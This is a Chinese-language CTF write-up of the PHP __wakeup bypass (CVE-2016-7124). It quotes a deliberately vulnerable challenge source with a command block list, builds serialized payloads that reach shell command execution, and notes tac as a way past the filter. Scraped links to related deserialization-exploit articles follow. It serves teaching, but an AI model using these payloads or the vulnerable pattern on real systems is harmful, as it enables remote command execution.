写在前面

wakeup()是在反序列化的基础之上进行的，如果你不是很清楚反序列化漏洞，可以点击下方：

反序列化漏洞

漏洞影响的版本

PHP5 < 5.6.25
PHP7 < 7.0.10

漏洞利用方法

若在对象的魔法函数中存在的__wakeup方法，那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法，但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

漏洞出现情况

1.可以之间或简介控制序列化结果
2.__wakeup()函数会强制修改某些内容

示例(Bugku-web-安慰奖)

题目源码

<?phpheader("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{protected $username = 'hack';protected $cmd = 'NULL';public function __construct($username,$cmd){$this->username = $username;$this->cmd = $cmd;}function __wakeup(){$this->username = 'guest';}function __destruct(){if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd)){exit('</br>flag能让你这么容易拿到吗？<br>');}if ($this->username === 'admin'){// echo "<br>right!<br>";$a = `$this->cmd`;var_dump($a);}else{echo "</br>给你个安慰奖吧，hhh！</br>";die();}}
}$select = $_GET['code'];$res=unserialize(@$select);
?>

这里的wakeup函数就强制对username属性进行更改，要得到flag就必须绕过wakeup，将username改成admin，然后再执行命令。
写出第一次的payload:

O:3:"ctf":2:{s:11:"*username";s:5:"admin";s:6:"*cmd";s:2:"ls";}

写的时候最好用脚本写，这里有protected关键字，要加*手写容易出错。
接下来将ctf的参值长度改为3，由于与反序列化规则不符，就会反序列化失败，绕过__wakeup(),但是__destruct仍然可以执行。

注：
或许你会疑惑：
明明无法完成反序列化，为什么还可以触发__destruct()，为什么还能够对username属性赋值？

你可以这样理解：
反序列化是一个正向检索的函数，虽然对于整体来说，数量不符，无法完成反序列化，但是可以尽可能检索能够完成反序列化的目标，所以这里数量改为了3，会先依次反序列化2个单位，直到无法检索到第3个目标才判定反序列化失败。
所以当然可以触发__destruct(),完成前面属性的赋值。

第二次的payload:

O:3:"ctf":3:{s:11:"*username";s:5:"admin";s:6:"*cmd";s:2:"ls";}

这里对命令进行了一定正则筛选
除了上述命令，还可以使用’tac’来检索文件
只是和cat反了过来。
并且由于是protected属性，会加上*，并且长度为3（上面payload username名称那里长度为11也能推断出）
在url编码中，%00代表空，所以我们要手动加上。还原完整payload
所以最终payload:

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"ls";}

拿到flag

PHP反序列化-__wakeup()方法漏洞（CVE-2016-7124）相关推荐

fastjson反序列化漏洞_漏洞预警Fastjson再爆反序列化代码执行漏洞；星巴克被发现存在信息泄露风险...
漏洞预警 Fastjson再次爆出通杀的反序列化代码执行漏洞漏洞信息据态势感知平台监测,网络上再次出现此前未曾发现的fastjson反序列化攻击向量. Fastjson是由阿里巴巴推出基于Java ...
wpf window 不执行show 就不能load执行_Numpy反序列化命令执行漏洞分析(CVE-2019-6446)附0day...
1.介绍 NumPy 是 Python 机器学习库中之一,主要对于多为数组执行计算.NumPy 提供大量的函数和操作,能够帮助程序员便利进行数值计算.在 NumPy 1.16.0 版本之前存在反序列 ...
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现漏洞环境搭建漏洞复现反弹shell 题外话1 题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生 ...
python pickle反序列化漏洞_Numpy反序列化命令执行漏洞分析(CVE-2019-6446) –vr_system...
1. 介绍 NumPy 是 Python 机器学习库中之一,主要对于多为数组执行计算.NumPy提供大量的函数和操作,能够帮助程序员便利进行数值计算.在NumPy 1.16.0版本之前存在反序列化 ...
php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限
此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...
程序验证Jackson反序列化的规则、Jackson序列化与反序列化关键方法程序详细分析
目录 0. 为什么要做这个分析 1. Jackson反序列化时,无参构造.有参构造的执行顺序[附程序截图] 1.1 没有无参构造时: 1.2 无参构造和有参构造方法都有的时候先走无参构造: 2. Ja ...
【Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
脚本小子上线啦,开始复现以前出现实战环境的漏洞了,我会记录一些复现的漏洞(不会是全部),今天这个漏洞的原理我也不太会就知道是个Java反序列化的洞,只负责复现(脚本小子~). 漏洞介绍&环境搭 ...
php up,PHP中 __wakeup()方法详解
__wakeup(),执行unserialize()时,先会调用这个函数如果说 __sleep() 是白的,那么 __wakeup() 就是黑的了. 那么为什么呢? 因为: 与之相反,`unseri ...
03 - vulhub - Apereo CAS 4.1 反序列化命令执行漏洞
文章目录漏洞名称:Apereo CAS 4.1 反序列化命令执行漏洞影响版本漏洞原理漏洞复现环境准备漏洞检测漏洞利用验证漏洞利用是否成功修复建议漏洞名称:Apereo CAS 4. ...
【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现
楼主困了,这里就直接写上楼主自己的一些操作详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现特征: 1.网站根目录下有cas目录 2.如图所示,有apereo CAS图标 3.如 ...

PHP反序列化-__wakeup()方法漏洞（CVE-2016-7124）